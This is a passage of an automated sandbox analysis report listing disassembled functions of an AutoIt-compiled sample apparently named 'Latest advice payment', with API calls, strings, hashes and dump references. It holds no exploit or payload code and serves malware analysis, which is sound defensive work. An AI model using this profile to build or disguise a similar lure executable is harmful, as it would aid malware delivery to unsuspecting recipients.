                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7ABB
                                                            • GlobalLock.KERNEL32(00000000), ref: 005D7AC4
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7AD3
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 005D7ADC
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7AE3
                                                            • GlobalFree.KERNEL32(00000000), ref: 005D7AEE
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7B00
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,005F2CAC,00000000), ref: 005D7B16
                                                            • GlobalFree.KERNEL32(00000000), ref: 005D7B26
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 005D7B4C
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 005D7B6B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7B8D
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005D7D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 3a6a17562aab9c16761d852d1984127410ad9649bf1cd3237c7ea0ca6551bddf
                                                            • Instruction ID: 77b4f67032dea1c34ccdf0e0fc07ef2aedb679f046afc1c8328f751ca7ab838e
                                                            • Opcode Fuzzy Hash: 3a6a17562aab9c16761d852d1984127410ad9649bf1cd3237c7ea0ca6551bddf
                                                            • Instruction Fuzzy Hash: F3025C71900119EFDB24DFA8DC89EAE7BB9FB48310F10815AF945AB2A1DB309D01DB60
                                                            Function 005E356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,005EF910), ref: 005E3627
                                                            • IsWindowVisible.USER32(?), ref: 005E364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: c41785880b21e53e8cf1b346665d2c8f0f709f5b9ed44e6c0bd5cf6ec519cde4
                                                            • Instruction ID: 8e5ec3efc75d7626a5e2969f3611368dc6a2f667ee1c84d98ad6a924af68598e
                                                            • Opcode Fuzzy Hash: c41785880b21e53e8cf1b346665d2c8f0f709f5b9ed44e6c0bd5cf6ec519cde4
                                                            • Instruction Fuzzy Hash: D8D184742043429BCB08EF11C45AAAE7FA6BF94344F154868F8C15B3E2DB31EE4ACB51
                                                            Function 005EA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 005EA630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 005EA661
                                                            • GetSysColor.USER32(0000000F), ref: 005EA66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 005EA687
                                                            • SelectObject.GDI32(?,00000000), ref: 005EA696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 005EA6C1
                                                            • GetSysColor.USER32(00000010), ref: 005EA6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 005EA6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 005EA6DF
                                                            • DeleteObject.GDI32(00000000), ref: 005EA6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 005EA731
                                                            • FillRect.USER32(?,?,00000000), ref: 005EA763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005EA78E
                                                              • Part of subcall function 005EA8CA: GetSysColor.USER32(00000012), ref: 005EA903
                                                              • Part of subcall function 005EA8CA: SetTextColor.GDI32(?,?), ref: 005EA907
                                                              • Part of subcall function 005EA8CA: GetSysColorBrush.USER32(0000000F), ref: 005EA91D
                                                              • Part of subcall function 005EA8CA: GetSysColor.USER32(0000000F), ref: 005EA928
                                                              • Part of subcall function 005EA8CA: GetSysColor.USER32(00000011), ref: 005EA945
                                                              • Part of subcall function 005EA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005EA953
                                                              • Part of subcall function 005EA8CA: SelectObject.GDI32(?,00000000), ref: 005EA964
                                                              • Part of subcall function 005EA8CA: SetBkColor.GDI32(?,00000000), ref: 005EA96D
                                                              • Part of subcall function 005EA8CA: SelectObject.GDI32(?,?), ref: 005EA97A
                                                              • Part of subcall function 005EA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 005EA999
                                                              • Part of subcall function 005EA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005EA9B0
                                                              • Part of subcall function 005EA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 005EA9C5
                                                              • Part of subcall function 005EA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005EA9ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: 9c96f9229b3336cbb6cfd88613d31c0d9a6e7418078757be173875e5d477a4d2
                                                            • Instruction ID: 94e35076991e19e579bb56df19dedb09ef9b01eb705d305f207d7df934f527c3
                                                            • Opcode Fuzzy Hash: 9c96f9229b3336cbb6cfd88613d31c0d9a6e7418078757be173875e5d477a4d2
                                                            • Instruction Fuzzy Hash: 1B919072408341EFD7189F64DC48A5B7BB9FF98321F101A29F5E29A1A0DB30E948DB52
                                                            Function 005D74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 005D74DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005D759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005D75DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005D75ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 005D7633
                                                            • GetClientRect.USER32(00000000,?), ref: 005D763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 005D7683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 005D7692
                                                            • GetStockObject.GDI32(00000011), ref: 005D76A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 005D76A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005D76B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005D76BF
                                                            • DeleteDC.GDI32(00000000), ref: 005D76C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005D76F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 005D770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 005D7746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 005D775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 005D776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 005D779B
                                                            • GetStockObject.GDI32(00000011), ref: 005D77A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005D77B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005D77BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 9ed0f843fe5c840fd0210b1c0f18d82b6130842f67ff994a4f0b9605907c3899
                                                            • Instruction ID: 63302e1b117e0c2eb496f6ed57d10cc7543028dc6f53229cfbcae3ee88cfba9d
                                                            • Opcode Fuzzy Hash: 9ed0f843fe5c840fd0210b1c0f18d82b6130842f67ff994a4f0b9605907c3899
                                                            • Instruction Fuzzy Hash: F3A16471A41619BFEB24DBA4DC49FAE7B79FB48710F108115FA15AB2E0DB70AD01CB60
                                                            Function 005CAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CAD1E
                                                            • GetDriveTypeW.KERNEL32(?,005EFAC0,?,\\.\,005EF910), ref: 005CADFB
                                                            • SetErrorMode.KERNEL32(00000000,005EFAC0,?,\\.\,005EF910), ref: 005CAF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 56fbc2ba5c8b7018374d253233da32693fadadd8287dd837d4b5bbfef593bdfb
                                                            • Instruction ID: 5d8ec03d63348ba6313b1c295ab9cc9df93c43122f84357c89090c93b5b250f1
                                                            • Opcode Fuzzy Hash: 56fbc2ba5c8b7018374d253233da32693fadadd8287dd837d4b5bbfef593bdfb
                                                            • Instruction Fuzzy Hash: 6B51D6B464820EDF8B00DBA0C986EFD7FA6FF48308724495EE407A7291EE319D41DB52
                                                            Function 005668DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 9093688de1f1b637695905950e8c4ddcf37de0c5f9c87b6174df271d2a961ffd
                                                            • Instruction ID: 46f9df8e6d4ea578692a9aeff8040de5973b84b160d921b4ecaaffa73e92f2b2
                                                            • Opcode Fuzzy Hash: 9093688de1f1b637695905950e8c4ddcf37de0c5f9c87b6174df271d2a961ffd
                                                            • Instruction Fuzzy Hash: 3181E3B0640206AADF20BA60DC47FAA7FA9FF55700F044424FD45AB196EB60EA45C7A1
                                                            Function 005E9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 005E9AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 005E9B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 005E9BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0
                                                            • API String ID: 2326795674-4108050209
                                                            • Opcode ID: 820bf34e7136ed9ee94e546420a2a72b4159c4cdfe72ae43eccb3d0cde9831ad
                                                            • Instruction ID: 1d4127f5fe2ae6fbdcc25f88119f160d67bf195cc2f04426baa8d66ef7d8d4e7
                                                            • Opcode Fuzzy Hash: 820bf34e7136ed9ee94e546420a2a72b4159c4cdfe72ae43eccb3d0cde9831ad
                                                            • Instruction Fuzzy Hash: B902DF70104381AFD729CF26C889BAABFE5FF95300F04892DF9D99A2A1C774D944DB52
                                                            Function 005EA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 005EA903
                                                            • SetTextColor.GDI32(?,?), ref: 005EA907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 005EA91D
                                                            • GetSysColor.USER32(0000000F), ref: 005EA928
                                                            • CreateSolidBrush.GDI32(?), ref: 005EA92D
                                                            • GetSysColor.USER32(00000011), ref: 005EA945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 005EA953
                                                            • SelectObject.GDI32(?,00000000), ref: 005EA964
                                                            • SetBkColor.GDI32(?,00000000), ref: 005EA96D
                                                            • SelectObject.GDI32(?,?), ref: 005EA97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 005EA999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005EA9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 005EA9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005EA9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005EAA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 005EAA32
                                                            • DrawFocusRect.USER32(?,?), ref: 005EAA3D
                                                            • GetSysColor.USER32(00000011), ref: 005EAA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 005EAA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 005EAA67
                                                            • SelectObject.GDI32(?,005EA5FA), ref: 005EAA7E
                                                            • DeleteObject.GDI32(?), ref: 005EAA89
                                                            • SelectObject.GDI32(?,?), ref: 005EAA8F
                                                            • DeleteObject.GDI32(?), ref: 005EAA94
                                                            • SetTextColor.GDI32(?,?), ref: 005EAA9A
                                                            • SetBkColor.GDI32(?,?), ref: 005EAAA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 0fabd7fb400c0debc8c362be3abd264ce52153a2d3612c01c81137482dda465b
                                                            • Instruction ID: 5c1d179c4f8f1ff208ba452420355b20f3519eebc1e0557ddcc3cc667df36682
                                                            • Opcode Fuzzy Hash: 0fabd7fb400c0debc8c362be3abd264ce52153a2d3612c01c81137482dda465b
                                                            • Instruction Fuzzy Hash: 3B516C71800248EFDB149FA4DC88EAE7FB9FB48320F114625F951AB2A1DB719944DF90
                                                            Function 005E89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005E8AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E8AD2
                                                            • CharNextW.USER32(0000014E), ref: 005E8B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005E8B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005E8B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E8B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 005E8B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 005E8BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 005E8BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 005E8C1F
                                                            • _memset.LIBCMT ref: 005E8C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 005E8C8D
                                                            • _memset.LIBCMT ref: 005E8CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005E8D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 005E8D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 005E8E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 005E8E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005E8E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005E8EB4
                                                            • DrawMenuBar.USER32(?), ref: 005E8EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 005E8EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 7853ad833910448bcdc114d3f9658845ad32b7af0f075d7bbb3c2cf66aac1dc0
                                                            • Instruction ID: d7ee6bb72bf8cb193ac0ab14c64eb59e14255799282fb8681f43c758b83db718
                                                            • Opcode Fuzzy Hash: 7853ad833910448bcdc114d3f9658845ad32b7af0f075d7bbb3c2cf66aac1dc0
                                                            • Instruction Fuzzy Hash: A8E16170900299AFDB249F51CC84EFE7F79FF45710F108156F999AA190DB709A84DF50
                                                            Function 005E488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 005E49CA
                                                            • GetDesktopWindow.USER32 ref: 005E49DF
                                                            • GetWindowRect.USER32(00000000), ref: 005E49E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005E4A48
                                                            • DestroyWindow.USER32(?), ref: 005E4A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005E4A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005E4ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 005E4AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 005E4AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005E4B09
                                                            • IsWindowVisible.USER32(?), ref: 005E4B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 005E4B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 005E4B58
                                                            • GetWindowRect.USER32(?,?), ref: 005E4B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 005E4B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 005E4BB0
                                                            • CopyRect.USER32(?,?), ref: 005E4BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 005E4C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 02809c86a5d2c01172442e06e12e406fd45c431ea080c6db4df13c02899f1a61
                                                            • Instruction ID: 564145db4821015abd5da8469e6984de364e461b7024a40866fd04f43d976210
                                                            • Opcode Fuzzy Hash: 02809c86a5d2c01172442e06e12e406fd45c431ea080c6db4df13c02899f1a61
                                                            • Instruction Fuzzy Hash: 83B16A71608381AFDB08DF65C888B6ABBE5BF84310F008929F5D99B2A1DB71EC05CF55
                                                            Function 005C449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005C44AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005C44D2
                                                            • _wcscpy.LIBCMT ref: 005C4500
                                                            • _wcscmp.LIBCMT ref: 005C450B
                                                            • _wcscat.LIBCMT ref: 005C4521
                                                            • _wcsstr.LIBCMT ref: 005C452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 005C4548
                                                            • _wcscat.LIBCMT ref: 005C4591
                                                            • _wcscat.LIBCMT ref: 005C4598
                                                            • _wcsncpy.LIBCMT ref: 005C45C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
